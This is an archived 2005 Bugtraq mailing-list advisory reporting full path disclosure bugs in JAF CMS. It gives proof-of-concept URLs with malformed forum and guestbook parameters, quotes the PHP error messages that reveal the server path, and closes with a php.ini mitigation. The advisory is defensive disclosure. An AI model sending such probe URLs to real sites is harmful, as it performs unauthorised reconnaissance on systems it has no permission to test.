lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050623092143.19827.qmail@securityfocus.com>
Date: 23 Jun 2005 09:21:43 -0000
From: the_day@...o.or.id
To: bugtraq@...urityfocus.com
Subject: [ECHO_ADV_20$2005] Full path disclosure JAF CMS


---------------------------------------------------------------------------
[ECHO_ADV_20$2005] Full path disclosure JAF CMS
---------------------------------------------------------------------------

Author: Dedi Dwianto
Date: June, 23th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv20-theday-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : JAF CMS
version: < 3.0 Final
URL  : http://jaf-cms.opensource-indonesia.com
Author : Salim "ph03y3nk"
Description :

JAF CMS - ...just another flat file CMS, is a Content Management System (CMS)
consist of a powerful set of PHP scripts that allow you to maintain personal
home page. There is no need for a database. The pages stored in a simple flat
file. I've coded this script because I realize that its hard to found server
(especially free space) offering PHP with database support already.

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Full path disclosure:

   A remote user can access the file directly to cause the system to display  
   an error message that indicates the installation path. The resulting error 
   message will disclose potentially sensitive installation path information 
   to the remote attacker.

  * http://victim/index.php?page=forum&category=general&id=[id]/*

  POC :
  
  http://localhost/jaf-cms/index.php?page=forum&category=general&id=3/*
  
  Warning: fopen(module/files/3/*): failed to open stream: No such file or directory
  in /var/www/html/jaf-cms/module/forum/inc/csvfile.php on line 197


  * http://victim/index.php?page=forum&view_type=topic&id=/*

  POC :

  http://localhost/jaf-cms/index.php?page=forum&view_type=topic&id=

  Warning: fopen(module/files/): failed to open stream: Is a directory 
  in /var/www/html/jaf-cms/module/forum/inc/csvfile.php on line 197


  * http://victim/index.php?page=guestbook&disp=[id]/*

  POC :
 
  http://victim/index.php?page=guestbook&disp=[id]/*

  Notice: Undefined offset: 6 in /var/www/html/jaf-cm/module/guestbook/guestbook.php on line 250


B. Fix
  report to vendor 21 June 2005
  vendor No response

  For User and do not know how to fix the script , change php.ini file setting 
  then turn on log_errors , and turn off display_error

---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ Lieur Euy , MSR
~ newbie_hacker@...oogroups.com ,
~ #e-c-h-o@...NET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     the_day || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ